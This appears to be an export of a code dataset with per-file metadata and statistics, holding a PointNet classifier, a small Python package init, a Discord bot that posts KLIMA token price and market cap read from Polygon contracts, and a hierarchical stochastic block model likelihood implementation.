from models.pointnet_globalfeat import PointNetfeat
from models.pointnet_globalfeat import PointNetfeat_vanilla
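# The two classifier heads below are identical apart from the global feature
# extractor they wrap (PointNetfeat_vanilla vs. PointNetfeat).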
class PointNetCls_vanilla(nn.Block):
    def __init__(self, num_points=2500, k=2, routing=None):
        super(PointNetCls_vanilla, self).__init__()
        self.num_points = num_points
        self.feat = PointNetfeat_vanilla(num_points, global_feat=True, routing=routing)
        self.fc1 = nn.Dense(512)
        self.fc2 = nn.Dense(256)
        self.fc3 = nn.Dense(k)
        self.dp = nn.Dropout(.7)
        self.bn1 = nn.BatchNorm(in_channels=512)
        self.bn2 = nn.BatchNorm(in_channels=256)

    def forward(self, x):
        x, trans = self.feat(x)
        x = nd.relu(self.bn1(self.fc1(x)))
        x = nd.relu(self.bn2(self.fc2(x)))
        x = self.dp(x)
        x = self.fc3(x)
        return x, trans


class PointNetCls(nn.Block):
    def __init__(self, num_points=2500, k=2, routing=None):
        super(PointNetCls, self).__init__()
        self.num_points = num_points
        self.feat = PointNetfeat(num_points, global_feat=True, routing=routing)
        self.fc1 = nn.Dense(512)
        self.fc2 = nn.Dense(256)
        self.fc3 = nn.Dense(k)
        self.dp = nn.Dropout(.7)
        self.bn1 = nn.BatchNorm(in_channels=512)
        self.bn2 = nn.BatchNorm(in_channels=256)

    def forward(self, x):
        x, trans = self.feat(x)
        x = nd.relu(self.bn1(self.fc1(x)))
        x = nd.relu(self.bn2(self.fc2(x)))
        x = self.dp(x)
        x = self.fc3(x)
        return x, trans
| 34.977778
| 87
| 0.623253
| 231
| 1,574
| 4.090909
| 0.203463
| 0.021164
| 0.046561
| 0.071958
| 0.895238
| 0.895238
| 0.797884
| 0.797884
| 0.797884
| 0.797884
| 0
| 0.047297
| 0.247776
| 1,574
| 45
| 88
| 34.977778
| 0.750845
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89884681e1054ef492cbfc8911f147d6e91a5f58
| 301
|
py
|
Python
|
impl/multiply/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/multiply/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/multiply/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
from .multiply import (c_long,
                       c_recursive,
                       py_builtin,
                       adapt_benchmark_args,
                       adapt_run_args)

__all__ = [
    'c_long',
    'c_recursive',
    'py_builtin',
    'adapt_benchmark_args',
    'adapt_run_args'
]
| 21.5
| 44
| 0.488372
| 28
| 301
| 4.607143
| 0.464286
| 0.077519
| 0.093023
| 0.232558
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0.837209
| 0
| 0
| 0.431894
| 301
| 13
| 45
| 23.153846
| 0.754386
| 0
| 0
| 0
| 0
| 0
| 0.202658
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98adc8f7b956fd8d3b9dfbd91b0183aa69d9ba29
| 17,802
|
py
|
Python
|
src/klima_price/main.py
|
0xJem/discord-bots
|
46ce60e9e64ba0643f8dbb15a4970a68482a4813
|
[
"MIT"
] | 1
|
2021-12-24T03:05:43.000Z
|
2021-12-24T03:05:43.000Z
|
src/klima_price/main.py
|
frankTurtle/discord-bots
|
376527ad32537b303a4718a525369df2f513cf2a
|
[
"MIT"
] | null | null | null |
src/klima_price/main.py
|
frankTurtle/discord-bots
|
376527ad32537b303a4718a525369df2f513cf2a
|
[
"MIT"
] | null | null | null |
import os
import json
from web3 import Web3
import discord
from discord.ext import commands, tasks
BOT_TOKEN = os.environ["DISCORD_BOT_TOKEN"]
# Initialized Discord client
intents = discord.Intents.all()
intents.members = True
client = commands.Bot(intents=intents, help_command=None, command_prefix='&?')
# Initialize web3
project_id = os.environ['WEB3_INFURA_PROJECT_ID']
polygon_mainnet_endpoint = f'https://polygon-mainnet.infura.io/v3/{project_id}'
web3 = Web3(Web3.HTTPProvider(polygon_mainnet_endpoint))
assert(web3.isConnected())
def lp_contract_info(sushi_address, basePrice=1):
address = Web3.toChecksumAddress(sushi_address)
abi = json.loads('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Burn","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1","type":"uint256"}],"name":"Mint","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint112","name":"reserve0","type":"uint112"},{"indexed":false,"internalType":"uint112","name":"reserve1","type":"uint112"}],"name":"Sync","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MINIMUM_LIQUIDITY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"PERMIT_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"burn","outputs":[{"internalType":"uint256","name":"amount0","type":"uint256"},{"internalType":"uint256","name":"amount1","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],
"stateMutability":"view","type":"function"},{"inputs":[],"name":"factory","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getReserves","outputs":[{"internalType":"uint112","name":"_reserve0","type":"uint112"},{"internalType":"uint112","name":"_reserve1","type":"uint112"},{"internalType":"uint32","name":"_blockTimestampLast","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_token0","type":"address"},{"internalType":"address","name":"_token1","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"kLast","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"mint","outputs":[{"internalType":"uint256","name":"liquidity","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"price0CumulativeLast","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price1CumulativeLast","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"skim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount0Out","type":"uint256"},{"internalType":"uint256","name":"amount1Out","type":"uint256"},{"internalType":"address","name":"to","type":"address"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sync","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"token0","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"token1","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"interna
lType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]') # noqa: E501
sushiLP = web3.eth.contract(address=address, abi=abi)
try:
Reserves = sushiLP.functions.getReserves().call()
# usdc-bct
if sushi_address == '0x1e67124681b402064cd0abe8ed1b5c79d2e02f64':
tokenPrice = Reserves[0]*basePrice*1e12/Reserves[1]
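# Assumption: the 1e12 factor bridges the pair's differing on-chain decimals
# (USDC commonly uses 6 decimals, BCT 18); not documented in the source.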
# bct-klima
else:
tokenPrice = Reserves[0]*basePrice/(Reserves[1]*1e9)
return(tokenPrice)
except Exception:
pass
def klima_info():
address = Web3.toChecksumAddress("0x4e78011Ce80ee02d2c3e649Fb657E45898257815")
abi = json.loads('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"previousTWAPEpochPeriod","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newTWAPEpochPeriod","type":"uint256"}],"name":"TWAPEpochChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousTWAPOracle","type":"address"},{"indexed":true,"internalType":"address","name":"newTWAPOracle","type":"address"}],"name":"TWAPOracleChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newTWAPSource","type":"address"}],"name":"TWAPSourceAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"removedTWAPSource","type":"address"}],"name":"TWAPSourceRemoved","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"PERMIT_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account_","type":"address"},{"internalType":"uint256","name":"amount_","type":"uint256"}],"name":"_burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newTWAPSourceDexPool_","type":"address"}],"name":"addTWAPSource","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account_","type":"address"},{"internalType":"uint256","name":"amount_","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newTWAPEpochPeriod_","type":"uint256
"}],"name":"changeTWAPEpochPeriod","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newTWAPOracle_","type":"address"}],"name":"changeTWAPOracle","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account_","type":"address"},{"internalType":"uint256","name":"amount_","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"twapSourceToRemove_","type":"address"}],"name":"removeTWAPSource","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"vault_","type":"address"}],"name":"setVault","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner_","type":"address"}]
,"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"twapEpochPeriod","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"twapOracle","outputs":[{"internalType":"contract ITWAPOracle","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"vault","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]') # noqa: E501
klima_contract = web3.eth.contract(address=address, abi=abi)
try:
total_supply = klima_contract.functions.totalSupply().call()
return(total_supply/1e9)
except Exception:
pass
def get_info():
bct_price = lp_contract_info(sushi_address='0x1e67124681b402064cd0abe8ed1b5c79d2e02f64')
klima_price = lp_contract_info(sushi_address='0x9803c7ae526049210a1725f7487af26fe2c24614', basePrice=bct_price) # noqa: E501
supply = klima_info()
return(klima_price, supply)
@client.event
async def on_ready():
print('Logged in as {0.user}'.format(client))
if not update_info.is_running():
update_info.start()
@tasks.loop(seconds=300)
async def update_info():
price, supply = get_info()
if price is not None:
print(f'${price:,.2f} KLIMA')
print(f'Marketcap: ${price*supply/1e6:,.1f}M')
for guild in client.guilds:
guser = guild.get_member(client.user.id)
try:
await guser.edit(nick=f'${price:,.2f} KLIMA')
except discord.errors.HTTPException:
return
if supply is not None:
try:
await client.change_presence(
activity=discord.Activity(
type=discord.ActivityType.playing,
name=f'Marketcap: ${price*supply/1e6:,.1f}M'
)
)
except discord.errors.HTTPException:
return
client.run(BOT_TOKEN)
| 183.525773
| 7,663
| 0.662285
| 1,752
| 17,802
| 6.690639
| 0.123288
| 0.076011
| 0.117727
| 0.079338
| 0.800119
| 0.786555
| 0.749616
| 0.679918
| 0.656714
| 0.626088
| 0
| 0.03179
| 0.036962
| 17,802
| 96
| 7,664
| 185.4375
| 0.651948
| 0.00528
| 0
| 0.176471
| 0
| 0.029412
| 0.870226
| 0.861751
| 0
| 0
| 0.009492
| 0
| 0.014706
| 1
| 0.044118
| false
| 0.029412
| 0.073529
| 0
| 0.147059
| 0.044118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7f4a1f54cb53c4f2cb4e60edbc97d732443fdf42
| 9,921
|
py
|
Python
|
pysbm/sbm/peixotos_hierarchical_sbm_full.py
|
DM2-ND/CFLP
|
c3e29a73fc9e0779e4bcfd5fefcc314df959351f
|
[
"Apache-2.0"
] | 13
|
2021-06-07T04:29:39.000Z
|
2022-03-25T05:58:33.000Z
|
pysbm/sbm/peixotos_hierarchical_sbm_full.py
|
DM2-ND/CFLP
|
c3e29a73fc9e0779e4bcfd5fefcc314df959351f
|
[
"Apache-2.0"
] | 2
|
2021-11-04T02:26:05.000Z
|
2021-11-22T17:55:01.000Z
|
pysbm/sbm/peixotos_hierarchical_sbm_full.py
|
DM2-ND/CFLP
|
c3e29a73fc9e0779e4bcfd5fefcc314df959351f
|
[
"Apache-2.0"
] | 2
|
2021-06-10T17:12:31.000Z
|
2022-01-11T15:47:09.000Z
|
# Implementation based on the following publication of Tiago P. Peixoto
# Nonparametric Bayesian inference of the microcanonical stochastic block model
# full version with scipy
import math
from scipy.special import binom
from .peixotos_flat_sbm_full import ModelLikelihoodOfFlatMicrocanonicalDegreeCorrectedSbm
from .peixotos_hierarchical_sbm_tools_full import BINOMIALS
from .nxpartitiongraphbased import NxHierarchicalPartition
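# BINOMIALS (imported above) is used below as a shared memoization cache, so
# each scipy binom(n, k) value is computed at most once across all calls.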
# ---------------------------
# Hierarchical Version
# ---------------------------
# @formatter:off
class ModelLikelihoodOfHierarchicalMicrocanonicalDegreeCorrectedSbm(
        ModelLikelihoodOfFlatMicrocanonicalDegreeCorrectedSbm):

    def calculate_complete_uniform_hyperprior_undirected(self, hierarchy_partition):
        saved_level = hierarchy_partition.actual_level
        hierarchy_partition.actual_level = 0
        probability = 1
        probability *= self._calculate_p_adjacency_undirected(hierarchy_partition)
        probability *= self._calculate_p_degree_sequence_uniform_hyperprior_undirected(hierarchy_partition)
        probability *= self._calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition)
        hierarchy_partition.actual_level = saved_level
        return probability

    def calculate_complete_uniform_undirected(self, hierarchy_partition):
        saved_level = hierarchy_partition.actual_level
        hierarchy_partition.actual_level = 0
        probability = 1
        probability *= self._calculate_p_adjacency_undirected(hierarchy_partition)
        probability *= self._calculate_p_degree_sequence_uniform_undirected(hierarchy_partition)
        probability *= self._calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition)
        hierarchy_partition.actual_level = saved_level
        return probability

    def calculate_complete_non_degree_corrected_undirected(self, hierarchy_partition):
        saved_level = hierarchy_partition.actual_level
        hierarchy_partition.actual_level = 0
        probability = 1
        probability *= self._calculate_non_degree_corrected_undirected(hierarchy_partition)
        probability *= self._calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition)
        hierarchy_partition.actual_level = saved_level
        return probability
    @staticmethod
    def _calculate_p_edge_counts_hierarchy_undirected(hierarchy_partition):
        r"""
        Formulas
        P({e_l}|{b_l}) = \prod_{l=1}^L P(e_l| e_{l+1}, b_l)
        P(e_l| e_{l+1}, b_l) = \prod_{r<s} (( n_r^l*n_s^l e_{rs}^{l+1} ))^{-1}
                               * \prod_r (( n_r^l*(n_r^l + 1)/2 e_{rr}^{l+1}/2 ))^{-1}
        P({b_l}) = \prod_{l=1}^L P(b_l)
        with P(b_l) as above
        P(b_l) = \prod_r n^l_r! / B_{l-1}! * \nCr(B_{l-1}-1, B_l-1)^{-1} * 1/B_{l-1}
        and boundary condition B_0 = N

        :param hierarchy_partition:
        :type hierarchy_partition: NxHierarchicalPartition
        :return: probability
        """
        # Notation with e_{rs}^{l+1} is a little bit confusing: it is the number of edges between
        # group n_r^l and n_s^l, which we save here in level l at edge_count(r, s)
        probability = 1
        number_of_blocks = 1
        for level in hierarchy_partition.iter_levels():
            hierarchy_partition.actual_level = level
            number_of_blocks = hierarchy_partition.B
            for r in range(number_of_blocks):
                n_r = hierarchy_partition.get_number_of_nodes_in_block(r)
                for s in range(r + 1, number_of_blocks):
                    n_s = hierarchy_partition.get_number_of_nodes_in_block(s)
                    temp = hierarchy_partition.get_edge_count(r, s)
                    binomial_values = (n_r * n_s + temp - 1, temp)
                    if binomial_values not in BINOMIALS:
                        BINOMIALS[binomial_values] = binom(*binomial_values)
                    probability /= BINOMIALS[binomial_values]

                # second product
                temp = hierarchy_partition.get_edge_count(r, r) / 2
                binomial_values = (n_r * (n_r + 1) / 2 + temp - 1, temp)
                if binomial_values not in BINOMIALS:
                    BINOMIALS[binomial_values] = binom(*binomial_values)
                probability /= BINOMIALS[binomial_values]

                probability *= math.factorial(n_r)

            # group independent terms of last product
            number_of_blocks_below = hierarchy_partition.get_number_of_blocks_in_level(level - 1)
            probability /= math.factorial(number_of_blocks_below)

            binomial_values = (number_of_blocks_below - 1, number_of_blocks - 1)
            if binomial_values not in BINOMIALS:
                BINOMIALS[binomial_values] = binom(*binomial_values)
            probability /= BINOMIALS[binomial_values]

            probability /= number_of_blocks_below

        # add last hierarchy level (singleton B_L = 1 not included in hierarchy partition)
        number_of_blocks_below = number_of_blocks
        binomial_values = (
            number_of_blocks_below * (number_of_blocks_below + 1) / 2 + hierarchy_partition.edge_total - 1,
            hierarchy_partition.edge_total)
        if binomial_values not in BINOMIALS:
            BINOMIALS[binomial_values] = binom(*binomial_values)
        probability /= BINOMIALS[binomial_values]

        # next factor \prod_r n_r^L!/B_{L-1}! is always one (n_r^L = n_1^L = B_{L-1})
        # next factor simplifies to 1 too, because binomial above 0 is always 1
        # and last factor
        probability /= number_of_blocks_below
        return probability
    # ----------------------------------
    # directed Versions
    # ----------------------------------
    def calculate_complete_uniform_hyperprior_directed(self, hierarchy_partition):
        saved_level = hierarchy_partition.actual_level
        hierarchy_partition.actual_level = 0
        probability = 1
        probability *= self._calculate_p_adjacency_directed(hierarchy_partition)
        probability *= self._calculate_p_degree_sequence_uniform_hyperprior_directed(hierarchy_partition)
        probability *= self._calculate_p_edge_counts_hierarchy_directed(hierarchy_partition)
        hierarchy_partition.actual_level = saved_level
        return probability

    def calculate_complete_uniform_directed(self, hierarchy_partition):
        saved_level = hierarchy_partition.actual_level
        hierarchy_partition.actual_level = 0
        probability = 1
        probability *= self._calculate_p_adjacency_directed(hierarchy_partition)
        probability *= self._calculate_p_degree_sequence_uniform_directed(hierarchy_partition)
        probability *= self._calculate_p_edge_counts_hierarchy_directed(hierarchy_partition)
        hierarchy_partition.actual_level = saved_level
        return probability

    def calculate_complete_non_degree_corrected_directed(self, hierarchy_partition):
        saved_level = hierarchy_partition.actual_level
        hierarchy_partition.actual_level = 0
        probability = 1
        probability *= self._calculate_non_degree_corrected_directed(hierarchy_partition)
        probability *= self._calculate_p_edge_counts_hierarchy_directed(hierarchy_partition)
        hierarchy_partition.actual_level = saved_level
        return probability
    @staticmethod
    def _calculate_p_edge_counts_hierarchy_directed(hierarchy_partition):
        r"""
        Formulas
        P({e_l}|{b_l}) = \prod_{l=1}^L P(e_l| e_{l+1}, b_l)
        P(e_l| e_{l+1}, b_l) = \prod_{r,s} (( n_r^l*n_s^l e_{rs}^{l+1} ))^{-1}
        P({b_l}) = \prod_{l=1}^L P(b_l)
        with P(b_l) as above
        P(b_l) = \prod_r n^l_r! / B_{l-1}! * \nCr(B_{l-1}-1, B_l-1)^{-1} * 1/B_{l-1}
        and boundary condition B_0 = N

        :param hierarchy_partition:
        :type hierarchy_partition: NxHierarchicalPartition
        :return: probability
        """
        probability = 1
        number_of_blocks = 1
        for level in hierarchy_partition.iter_levels():
            hierarchy_partition.actual_level = level
            number_of_blocks = hierarchy_partition.B
            for r in range(number_of_blocks):
                n_r = hierarchy_partition.get_number_of_nodes_in_block(r)
                for s in range(number_of_blocks):
                    n_s = hierarchy_partition.get_number_of_nodes_in_block(s)
                    temp = hierarchy_partition.get_edge_count(r, s)
                    binomial_values = (n_r * n_s + temp - 1, temp)
                    if binomial_values not in BINOMIALS:
                        BINOMIALS[binomial_values] = binom(*binomial_values)
                    probability /= BINOMIALS[binomial_values]

                probability *= math.factorial(n_r)

            number_of_blocks_below = hierarchy_partition.get_number_of_blocks_in_level(level - 1)
            probability /= math.factorial(number_of_blocks_below)

            binomial_values = (number_of_blocks_below - 1, number_of_blocks - 1)
            if binomial_values not in BINOMIALS:
                BINOMIALS[binomial_values] = binom(*binomial_values)
            probability /= BINOMIALS[binomial_values]

            probability /= number_of_blocks_below

        # include last hierarchy step
        number_of_blocks_below = number_of_blocks
        binomial_values = (
            number_of_blocks_below * number_of_blocks_below + hierarchy_partition.edge_total - 1,
            hierarchy_partition.edge_total)
        if binomial_values not in BINOMIALS:
            BINOMIALS[binomial_values] = binom(*binomial_values)
        probability /= BINOMIALS[binomial_values]

        # next factor \prod_r n_r^L!/B_{L-1}! is always one (n_r^L = n_1^L = B_{L-1})
        # next factor simplifies to 1 too, because binomial above 0 is always 1
        # and last factor
        probability /= number_of_blocks_below
        return probability
| 47.4689
| 116
| 0.672009
| 1,193
| 9,921
| 5.20285
| 0.11316
| 0.191397
| 0.067666
| 0.093443
| 0.868536
| 0.852425
| 0.852425
| 0.846786
| 0.843886
| 0.843886
| 0
| 0.010664
| 0.243826
| 9,921
| 209
| 117
| 47.4689
| 0.816716
| 0.206028
| 0
| 0.792308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.038462
| 0
| 0.169231
